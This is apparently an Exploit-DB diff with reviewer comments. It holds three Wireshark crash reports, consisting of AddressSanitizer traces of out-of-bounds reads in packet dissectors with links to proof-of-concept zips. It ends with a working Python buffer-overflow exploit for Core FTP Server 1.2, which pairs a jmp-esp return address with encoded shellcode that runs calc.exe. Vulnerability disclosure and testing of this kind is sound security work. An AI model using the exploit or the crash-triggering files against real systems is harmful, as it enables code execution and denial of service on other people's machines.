Heap right redzone: fb
Freed heap region: fd
Stack left redzone: f1
Stack mid redzone: f2
Stack right redzone: f3
Stack partial redzone: f4
Stack after return: f5
Stack use after scope: f8
Global redzone: f9
Global init order: f6
Poisoned by user: f7
Container overflow: fc
Array cookie: ac
Intra object redzone: bb
ASan internal: fe
Left alloca redzone: ca
Right alloca redzone: cb
==5092==ABORTING
--- cut ---
The crash was reported at https://bugs.wireshark.org/bugzilla/show_bug.cgi?id=11825. Attached are three files which trigger the crash.
Proof of Concept:
https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/sploits/39482.zip
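Review bot: The affected build is identified only as "current git master", with no commit hash or release number, so the report cannot be matched to a Wireshark version; add the affected and fixed versions from the upstream bug (bugs.wireshark.org id 11825) next to the link. The proof of concept is an external zip with no checksum recorded in this entry, and the text mentions "three files" without naming them; recording a SHA-256 of 39482.zip here would let consumers verify what they fetch. The line stating that the address is "located 0 bytes to the right of global variable 'nm_att_tlvdef_base'" of size 2040 is the key triage fact (a 4-byte read immediately past the end of that table at packet-gsm_abis_oml.c:1544) and would be easier to find if it were summarised above the full trace.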

@ -0,0 +1,74 @@
Source: https://code.google.com/p/google-security-research/issues/detail?id=654
The following crash due to an out-of-bounds read from static memory can be observed in an ASAN build of Wireshark (current git master), by feeding a malformed file to tshark ("$ ./tshark -nVxr /path/to/file"):
--- cut ---
==32475==ERROR: AddressSanitizer: global-buffer-overflow on address 0x7fd688698b10 at pc 0x7fd685351320 bp 0x7ffd862371a0 sp 0x7ffd86237198
READ of size 4 at 0x7fd688698b10 thread T0
#0 0x7fd68535131f in add_ff_vht_compressed_beamforming_report wireshark/epan/dissectors/packet-ieee80211.c:9143:8
#1 0x7fd68534746f in add_ff_action_vht wireshark/epan/dissectors/packet-ieee80211.c:9199:16
#2 0x7fd68533f813 in add_ff_action wireshark/epan/dissectors/packet-ieee80211.c:9426:12
#3 0x7fd685324811 in add_fixed_field wireshark/epan/dissectors/packet-ieee80211.c:9566:14
#4 0x7fd68536ebae in dissect_ieee80211_mgt wireshark/epan/dissectors/packet-ieee80211.c:16388:17
#5 0x7fd685368cce in dissect_ieee80211_common wireshark/epan/dissectors/packet-ieee80211.c:18218:7
#6 0x7fd685338dae in dissect_ieee80211 wireshark/epan/dissectors/packet-ieee80211.c:18375:10
#7 0x7fd6842c7cc1 in call_dissector_through_handle wireshark/epan/packet.c:616:8
#8 0x7fd6842ba5ea in call_dissector_work wireshark/epan/packet.c:691:9
#9 0x7fd6842b9dbd in dissector_try_uint_new wireshark/epan/packet.c:1148:9
#10 0x7fd684fc95f6 in dissect_frame wireshark/epan/dissectors/packet-frame.c:500:11
#11 0x7fd6842c7cc1 in call_dissector_through_handle wireshark/epan/packet.c:616:8
#12 0x7fd6842ba5ea in call_dissector_work wireshark/epan/packet.c:691:9
#13 0x7fd6842c42be in call_dissector_only wireshark/epan/packet.c:2662:8
#14 0x7fd6842b5ccf in call_dissector_with_data wireshark/epan/packet.c:2675:8
#15 0x7fd6842b533b in dissect_record wireshark/epan/packet.c:501:3
#16 0x7fd6842633c9 in epan_dissect_run_with_taps wireshark/epan/epan.c:373:2
#17 0x5264eb in process_packet wireshark/tshark.c:3728:5
#18 0x51f960 in load_cap_file wireshark/tshark.c:3484:11
#19 0x515daf in main wireshark/tshark.c:2197:13
0x7fd688698b10 is located 48 bytes to the left of global variable '<string literal>' defined in 'packet-ieee80211.c:9115:70' (0x7fd688698b40) of size 30
'<string literal>' is ascii string 'Average Signal to Noise Ratio'
0x7fd688698b10 is located 0 bytes to the right of global variable 'ns_arr' defined in 'packet-ieee80211.c:9091:20' (0x7fd688698ae0) of size 48
SUMMARY: AddressSanitizer: global-buffer-overflow wireshark/epan/dissectors/packet-ieee80211.c:9143:8 in add_ff_vht_compressed_beamforming_report
Shadow bytes around the buggy address:
0x0ffb510cb110: f9 f9 f9 f9 00 00 00 00 00 00 04 f9 f9 f9 f9 f9
0x0ffb510cb120: 00 00 00 07 f9 f9 f9 f9 00 00 07 f9 f9 f9 f9 f9
0x0ffb510cb130: 00 00 06 f9 f9 f9 f9 f9 00 00 00 00 00 03 f9 f9
0x0ffb510cb140: f9 f9 f9 f9 00 00 00 00 00 02 f9 f9 f9 f9 f9 f9
0x0ffb510cb150: 00 00 00 00 00 00 00 00 f9 f9 f9 f9 00 00 00 00
=>0x0ffb510cb160: 00 00[f9]f9 f9 f9 f9 f9 00 00 00 06 f9 f9 f9 f9
0x0ffb510cb170: 00 00 00 05 f9 f9 f9 f9 00 00 00 00 00 00 00 01
0x0ffb510cb180: f9 f9 f9 f9 00 00 04 f9 f9 f9 f9 f9 00 00 03 f9
0x0ffb510cb190: f9 f9 f9 f9 00 00 00 07 f9 f9 f9 f9 00 00 00 00
0x0ffb510cb1a0: 00 00 00 00 00 00 00 00 00 02 f9 f9 f9 f9 f9 f9
0x0ffb510cb1b0: 00 00 00 00 00 00 00 00 00 00 00 00 00 f9 f9 f9
Shadow byte legend (one shadow byte represents 8 application bytes):
Addressable: 00
Partially addressable: 01 02 03 04 05 06 07
Heap left redzone: fa
Heap right redzone: fb
Freed heap region: fd
Stack left redzone: f1
Stack mid redzone: f2
Stack right redzone: f3
Stack partial redzone: f4
Stack after return: f5
Stack use after scope: f8
Global redzone: f9
Global init order: f6
Poisoned by user: f7
Container overflow: fc
Array cookie: ac
Intra object redzone: bb
ASan internal: fe
Left alloca redzone: ca
Right alloca redzone: cb
==32475==ABORTING
--- cut ---
The crash was reported at https://bugs.wireshark.org/bugzilla/show_bug.cgi?id=11818. Attached are three files which trigger the crash.
Proof of Concept:
https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/sploits/39483.zip
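Review bot: The opening sentence pins the affected build only as "current git master", with no commit hash or release number, so a reader cannot tell from this file whether a given Wireshark build is affected. Please add the commit or version that was tested and, once known, the fixed release from bug 11818. The trace is clear enough to state the root cause in one line above the log: a 4-byte read at packet-ieee80211.c:9143 lands 0 bytes past the 48-byte global ns_arr in add_ff_vht_compressed_beamforming_report, which suggests an index into that table that is not checked against its length.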

141
platforms/multiple/dos/39484.txt Executable file

@ -0,0 +1,141 @@
Source: https://code.google.com/p/google-security-research/issues/detail?id=648
The following crash due to a static out-of-bounds read can be observed in an ASAN build of Wireshark (current git master), by feeding a malformed file to tshark ("$ ./tshark -nVxr /path/to/file"):
--- cut ---
==7855==ERROR: AddressSanitizer: global-buffer-overflow on address 0x000005676c18 at pc 0x000001ab09d2 bp 0x7ffc9ce376b0 sp 0x7ffc9ce376a8
READ of size 8 at 0x000005676c18 thread T0
#0 0x1ab09d1 in dissect_ber_set wireshark/epan/dissectors/packet-ber.c:2588:64
#1 0x198e7c7 in dissect_ansi_tcap_T_paramSet wireshark/epan/dissectors/../../asn1/ansi_tcap/ansi_tcap.cnf:189:12
#2 0x1ab47f4 in dissect_ber_choice wireshark/epan/dissectors/packet-ber.c:2898:21
#3 0x198e652 in dissect_ansi_tcap_T_parameter_03 wireshark/epan/dissectors/../../asn1/ansi_tcap/ansi_tcap.cnf:210:12
#4 0x1aae8bc in dissect_ber_sequence wireshark/epan/dissectors/packet-ber.c:2400:17
#5 0x198b2f7 in dissect_ansi_tcap_Reject wireshark/epan/dissectors/../../asn1/ansi_tcap/ansi_tcap.cnf:227:12
#6 0x1ab47f4 in dissect_ber_choice wireshark/epan/dissectors/packet-ber.c:2898:21
#7 0x198aee2 in dissect_ansi_tcap_ComponentPDU wireshark/epan/dissectors/../../asn1/ansi_tcap/ansi_tcap.cnf:256:12
#8 0x1abba52 in dissect_ber_sq_of wireshark/epan/dissectors/packet-ber.c:3490:9
#9 0x1abbe2f in dissect_ber_sequence_of wireshark/epan/dissectors/packet-ber.c:3521:12
#10 0x198ae17 in dissect_ansi_tcap_SEQUENCE_OF_ComponentPDU wireshark/epan/dissectors/../../asn1/ansi_tcap/ansi_tcap.cnf:270:12
#11 0x1a966a7 in dissect_ber_tagged_type wireshark/epan/dissectors/packet-ber.c:691:9
#12 0x19898ac in dissect_ansi_tcap_ComponentSequence wireshark/epan/dissectors/../../asn1/ansi_tcap/ansi_tcap.cnf:280:12
#13 0x1aae8bc in dissect_ber_sequence wireshark/epan/dissectors/packet-ber.c:2400:17
#14 0x198e887 in dissect_ansi_tcap_TransactionPDU wireshark/epan/dissectors/../../asn1/ansi_tcap/ansi_tcap.cnf:145:12
#15 0x1988ded in dissect_ansi_tcap_T_queryWithPerm wireshark/epan/dissectors/../../asn1/ansi_tcap/ansi_tcap.cnf:134:12
#16 0x1ab47f4 in dissect_ber_choice wireshark/epan/dissectors/packet-ber.c:2898:21
#17 0x1988b30 in dissect_ansi_tcap_PackageType wireshark/epan/dissectors/../../asn1/ansi_tcap/ansi_tcap.cnf:173:12
#18 0x1988830 in dissect_ansi_tcap wireshark/epan/dissectors/../../asn1/ansi_tcap/packet-ansi_tcap-template.c:385:5
#19 0xaf3794 in call_dissector_through_handle wireshark/epan/packet.c:616:8
#20 0xae5692 in call_dissector_work wireshark/epan/packet.c:691:9
#21 0xaefb1b in call_dissector_only wireshark/epan/packet.c:2662:8
#22 0xae09f3 in call_dissector_with_data wireshark/epan/packet.c:2675:8
#23 0xaefba8 in call_dissector wireshark/epan/packet.c:2692:9
#24 0x16c3f24 in dissect_tcap wireshark/epan/dissectors/../../asn1/tcap/packet-tcap-template.c:2004:14
#25 0xaf3794 in call_dissector_through_handle wireshark/epan/packet.c:616:8
#26 0xae5692 in call_dissector_work wireshark/epan/packet.c:691:9
#27 0xae4e1d in dissector_try_uint_new wireshark/epan/packet.c:1148:9
#28 0x11d6632 in dissect_sccp_data_param wireshark/epan/dissectors/packet-sccp.c:2346:31
#29 0x11d47a1 in dissect_sccp_parameter wireshark/epan/dissectors/packet-sccp.c:2559:5
#30 0x11d5169 in dissect_sccp_variable_parameter wireshark/epan/dissectors/packet-sccp.c:2640:3
#31 0x11cec1e in dissect_sccp_message wireshark/epan/dissectors/packet-sccp.c:2951:5
#32 0x11cc3f9 in dissect_sccp wireshark/epan/dissectors/packet-sccp.c:3402:3
#33 0xaf3794 in call_dissector_through_handle wireshark/epan/packet.c:616:8
#34 0xae5692 in call_dissector_work wireshark/epan/packet.c:691:9
#35 0xae4e1d in dissector_try_uint_new wireshark/epan/packet.c:1148:9
#36 0xae5a38 in dissector_try_uint wireshark/epan/packet.c:1174:9
#37 0xefae51 in dissect_mtp3_payload wireshark/epan/dissectors/packet-mtp3.c:647:8
#38 0xef8466 in dissect_mtp3 wireshark/epan/dissectors/packet-mtp3.c:767:3
#39 0xaf3794 in call_dissector_through_handle wireshark/epan/packet.c:616:8
#40 0xae5692 in call_dissector_work wireshark/epan/packet.c:691:9
#41 0xaefb1b in call_dissector_only wireshark/epan/packet.c:2662:8
#42 0xae09f3 in call_dissector_with_data wireshark/epan/packet.c:2675:8
#43 0xaefba8 in call_dissector wireshark/epan/packet.c:2692:9
#44 0x2da26b4 in dissect_protocol_data_1_parameter wireshark/epan/dissectors/packet-m2ua.c:507:3
#45 0x2da11b2 in dissect_parameter wireshark/epan/dissectors/packet-m2ua.c:952:5
#46 0x2da006b in dissect_parameters wireshark/epan/dissectors/packet-m2ua.c:1026:5
#47 0x2d9fb58 in dissect_message wireshark/epan/dissectors/packet-m2ua.c:1041:3
#48 0x2d9fa96 in dissect_m2ua wireshark/epan/dissectors/packet-m2ua.c:1058:3
#49 0xaf3794 in call_dissector_through_handle wireshark/epan/packet.c:616:8
#50 0xae5692 in call_dissector_work wireshark/epan/packet.c:691:9
#51 0xae4e1d in dissector_try_uint_new wireshark/epan/packet.c:1148:9
#52 0x39012a2 in dissect_payload wireshark/epan/dissectors/packet-sctp.c:2517:9
#53 0x38f7d37 in dissect_data_chunk wireshark/epan/dissectors/packet-sctp.c:3443:16
#54 0x38f0ac8 in dissect_sctp_chunk wireshark/epan/dissectors/packet-sctp.c:4360:14
#55 0x38ed8e6 in dissect_sctp_chunks wireshark/epan/dissectors/packet-sctp.c:4515:9
#56 0x38eb79f in dissect_sctp_packet wireshark/epan/dissectors/packet-sctp.c:4678:3
#57 0x38e95d5 in dissect_sctp wireshark/epan/dissectors/packet-sctp.c:4732:3
#58 0xaf3794 in call_dissector_through_handle wireshark/epan/packet.c:616:8
#59 0xae5692 in call_dissector_work wireshark/epan/packet.c:691:9
#60 0xae4e1d in dissector_try_uint_new wireshark/epan/packet.c:1148:9
#61 0x29c5318 in ip_try_dissect wireshark/epan/dissectors/packet-ip.c:2001:7
#62 0x29d0521 in dissect_ip_v4 wireshark/epan/dissectors/packet-ip.c:2485:10
#63 0xaf3794 in call_dissector_through_handle wireshark/epan/packet.c:616:8
#64 0xae5692 in call_dissector_work wireshark/epan/packet.c:691:9
#65 0xae4e1d in dissector_try_uint_new wireshark/epan/packet.c:1148:9
#66 0xae5a38 in dissector_try_uint wireshark/epan/packet.c:1174:9
#67 0x24e0824 in dissect_ethertype wireshark/epan/dissectors/packet-ethertype.c:307:21
#68 0xaf3794 in call_dissector_through_handle wireshark/epan/packet.c:616:8
#69 0xae5692 in call_dissector_work wireshark/epan/packet.c:691:9
#70 0xaefb1b in call_dissector_only wireshark/epan/packet.c:2662:8
#71 0xae09f3 in call_dissector_with_data wireshark/epan/packet.c:2675:8
#72 0x24dc752 in dissect_eth_common wireshark/epan/dissectors/packet-eth.c:545:5
#73 0x24d499a in dissect_eth_maybefcs wireshark/epan/dissectors/packet-eth.c:828:5
#74 0xaf3794 in call_dissector_through_handle wireshark/epan/packet.c:616:8
#75 0xae5692 in call_dissector_work wireshark/epan/packet.c:691:9
#76 0xae4e1d in dissector_try_uint_new wireshark/epan/packet.c:1148:9
#77 0x25dca12 in dissect_frame wireshark/epan/dissectors/packet-frame.c:500:11
#78 0xaf3794 in call_dissector_through_handle wireshark/epan/packet.c:616:8
#79 0xae5692 in call_dissector_work wireshark/epan/packet.c:691:9
#80 0xaefb1b in call_dissector_only wireshark/epan/packet.c:2662:8
#81 0xae09f3 in call_dissector_with_data wireshark/epan/packet.c:2675:8
#82 0xadffde in dissect_record wireshark/epan/packet.c:501:3
#83 0xab6d0d in epan_dissect_run_with_taps wireshark/epan/epan.c:373:2
#84 0x53c91b in process_packet wireshark/tshark.c:3728:5
#85 0x535d90 in load_cap_file wireshark/tshark.c:3484:11
#86 0x52c1df in main wireshark/tshark.c:2197:13
0x000005676c18 is located 8 bytes to the left of global variable '<string literal>' defined in '../../asn1/ansi_tcap/ansi_tcap.cnf:131:43' (0x5676c20) of size 15
'<string literal>' is ascii string 'queryWithPerm '
0x000005676c18 is located 24 bytes to the right of global variable 'T_paramSet_set' defined in '../../asn1/ansi_tcap/ansi_tcap.cnf:183:29' (0x5676be0) of size 32
SUMMARY: AddressSanitizer: global-buffer-overflow wireshark/epan/dissectors/packet-ber.c:2588:64 in dissect_ber_set
Shadow bytes around the buggy address:
0x000080ac6d30: 00 00 00 00 f9 f9 f9 f9 00 00 00 00 00 00 00 00
0x000080ac6d40: 00 00 00 00 00 00 00 f9 f9 f9 f9 f9 00 00 00 00
0x000080ac6d50: 00 00 00 00 00 00 00 00 00 00 00 00 f9 f9 f9 f9
0x000080ac6d60: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 f9
0x000080ac6d70: f9 f9 f9 f9 00 00 00 00 f9 f9 f9 f9 00 00 00 00
=>0x000080ac6d80: f9 f9 f9[f9]00 07 f9 f9 f9 f9 f9 f9 00 00 00 00
0x000080ac6d90: 00 00 00 00 00 00 00 00 00 00 00 00 f9 f9 f9 f9
0x000080ac6da0: 00 00 02 f9 f9 f9 f9 f9 00 02 f9 f9 f9 f9 f9 f9
0x000080ac6db0: 00 00 06 f9 f9 f9 f9 f9 00 00 00 01 f9 f9 f9 f9
0x000080ac6dc0: 07 f9 f9 f9 f9 f9 f9 f9 00 00 00 00 00 00 00 00
0x000080ac6dd0: 00 00 00 00 00 00 00 00 f9 f9 f9 f9 00 00 00 00
Shadow byte legend (one shadow byte represents 8 application bytes):
Addressable: 00
Partially addressable: 01 02 03 04 05 06 07
Heap left redzone: fa
Heap right redzone: fb
Freed heap region: fd
Stack left redzone: f1
Stack mid redzone: f2
Stack right redzone: f3
Stack partial redzone: f4
Stack after return: f5
Stack use after scope: f8
Global redzone: f9
Global init order: f6
Poisoned by user: f7
Container overflow: fc
Array cookie: ac
Intra object redzone: bb
ASan internal: fe
Left alloca redzone: ca
Right alloca redzone: cb
==7855==ABORTING
--- cut ---
The crash was reported at https://bugs.wireshark.org/bugzilla/show_bug.cgi?id=11796. Attached are three files which trigger the crash.
Proof of Concept:
https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/sploits/39484.zip
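Review bot: The description line says only "static out-of-bounds read" and never names the dissector, which makes this entry hard to tell apart from the other Wireshark ASAN reports added in the same commit. Suggest naming dissect_ber_set (packet-ber.c:2588) and the ANSI TCAP table T_paramSet_set in the first sentence, since the trace shows an 8-byte read 24 bytes past that 32-byte global. The 87-frame stack and the generic shadow byte legend could be cut to frames #0 through #18 plus the SUMMARY line without losing anything needed for triage.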


@ -0,0 +1,77 @@
#-*- coding: utf-8 -*-
#
# Exploit Title : Core FTP Server v1.2 - BufferOverflow POC
# Date: 2016-02-22
# Author: INSECT.B
# Facebook : https://www.facebook.com/B.INSECT00
# GitHub : binsect00
# Blog : http://binsect00.tistory.com
# Vendor Homepage : http://www.coreftp.com/
# Software Link:
# Version: 1.2
# Tested on: Windows7 Professional SP1 En x86
# CVE : N/A
'''
[+] Type : Buffer overflow
[+] Detail :
[-] The vulnerability has the most typical Buffer overflow vulnerabilities.
[-] Insert string into 'Log filename(include path)' field that [setup] - [new] - [Logging options] - [More]
[-] 'Log filename(include path)' field is no limit to the length and does not check the length
[-] Insert string "A"*1500 and press Ok, OK
[-] crash info
(3bc.e28): Access violation - code c0000005 (first chance)
First chance exceptions are reported before any exception handling.
This exception may be expected and handled.
eax=00000000 ebx=00000111 ecx=41414141 edx=0012a3d9 esi=00502438 edi=00000001
eip=41414141 esp=00129bf0 ebp=00129bf8 iopl=0 nv up ei pl nz na po nc
cs=001b ss=0023 ds=0023 es=0023 fs=003b gs=0000 efl=00010202
41414141 ?? ???
'''
import struct
junk = "A" * 312
EIP = struct.pack("<L",0x7795163b) # USER32!gSharedInfo+0x181fb:
# 7795163b ffe4 jmp esp
nop = "\x90" * 10
#windows/exec calc.exe
#encode : alpha_mixed
sehll = (
"\x89\xe5\xdb\xde\xd9\x75\xf4\x59\x49\x49\x49\x49\x49\x49" +
"\x49\x49\x49\x49\x49\x43\x43\x43\x43\x43\x43\x37\x51\x5a" +
"\x6a\x41\x58\x50\x30\x41\x30\x41\x6b\x41\x41\x51\x32\x41" +
"\x42\x32\x42\x42\x30\x42\x42\x41\x42\x58\x50\x38\x41\x42" +
"\x75\x4a\x49\x59\x6c\x68\x68\x6f\x72\x67\x70\x77\x70\x47" +
"\x70\x75\x30\x6f\x79\x4a\x45\x44\x71\x49\x50\x30\x64\x6c" +
"\x4b\x56\x30\x34\x70\x4e\x6b\x61\x42\x56\x6c\x6c\x4b\x71" +
"\x42\x77\x64\x4c\x4b\x32\x52\x67\x58\x76\x6f\x6c\x77\x71" +
"\x5a\x31\x36\x65\x61\x49\x6f\x4e\x4c\x67\x4c\x53\x51\x61" +
"\x6c\x37\x72\x44\x6c\x47\x50\x4f\x31\x38\x4f\x54\x4d\x36" +
"\x61\x58\x47\x58\x62\x69\x62\x46\x32\x51\x47\x6c\x4b\x61" +
"\x42\x46\x70\x6c\x4b\x52\x6a\x75\x6c\x6e\x6b\x42\x6c\x34" +
"\x51\x30\x78\x79\x73\x72\x68\x65\x51\x7a\x71\x30\x51\x6c" +
"\x4b\x53\x69\x57\x50\x43\x31\x58\x53\x4c\x4b\x62\x69\x76" +
"\x78\x58\x63\x75\x6a\x37\x39\x4c\x4b\x75\x64\x6c\x4b\x36" +
"\x61\x4e\x36\x54\x71\x69\x6f\x6e\x4c\x5a\x61\x5a\x6f\x54" +
"\x4d\x43\x31\x58\x47\x45\x68\x59\x70\x32\x55\x4b\x46\x64" +
"\x43\x51\x6d\x58\x78\x45\x6b\x31\x6d\x55\x74\x50\x75\x48" +
"\x64\x42\x78\x6c\x4b\x32\x78\x77\x54\x67\x71\x38\x53\x63" +
"\x56\x4c\x4b\x66\x6c\x62\x6b\x6e\x6b\x52\x78\x35\x4c\x63" +
"\x31\x68\x53\x6e\x6b\x45\x54\x4c\x4b\x46\x61\x5a\x70\x6c" +
"\x49\x47\x34\x65\x74\x31\x34\x61\x4b\x31\x4b\x75\x31\x43" +
"\x69\x52\x7a\x36\x31\x6b\x4f\x59\x70\x73\x6f\x63\x6f\x32" +
"\x7a\x4c\x4b\x45\x42\x78\x6b\x6e\x6d\x43\x6d\x31\x7a\x63" +
"\x31\x6c\x4d\x6c\x45\x4e\x52\x75\x50\x77\x70\x47\x70\x50" +
"\x50\x63\x58\x66\x51\x4e\x6b\x62\x4f\x6b\x37\x6b\x4f\x7a" +
"\x75\x6f\x4b\x4c\x30\x68\x35\x6f\x52\x61\x46\x43\x58\x69" +
"\x36\x7a\x35\x4d\x6d\x4f\x6d\x69\x6f\x68\x55\x65\x6c\x56" +
"\x66\x33\x4c\x37\x7a\x4d\x50\x49\x6b\x79\x70\x51\x65\x37" +
"\x75\x4f\x4b\x31\x57\x75\x43\x61\x62\x70\x6f\x73\x5a\x73" +
"\x30\x46\x33\x39\x6f\x6a\x75\x70\x63\x45\x31\x42\x4c\x63" +
"\x53\x74\x6e\x71\x75\x31\x68\x73\x55\x57\x70\x41\x41"
)
payload = junk + EIP + nop + sehll
with open("CoreFTPServer_Ex.txt","wb") as f :
f.write(payload)
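Review bot: The header leaves "Software Link:" empty and records no vendor contact or fixed version, so the only way to identify the affected build is the "Version: 1.2" line; please fill in the download reference or drop the field, and state whether the vendor was notified. Two smaller points: the payload variable is spelled sehll in both its definition and the final concatenation, and the return address comment ties 0x7795163b to USER32 on the single tested system (Windows7 Professional SP1 En x86), which should be stated as a limitation in the description block. For defenders the useful fact is already in the notes: the 'Log filename(include path)' field accepts input of any length, so the vendor-side fix is a length check on that field.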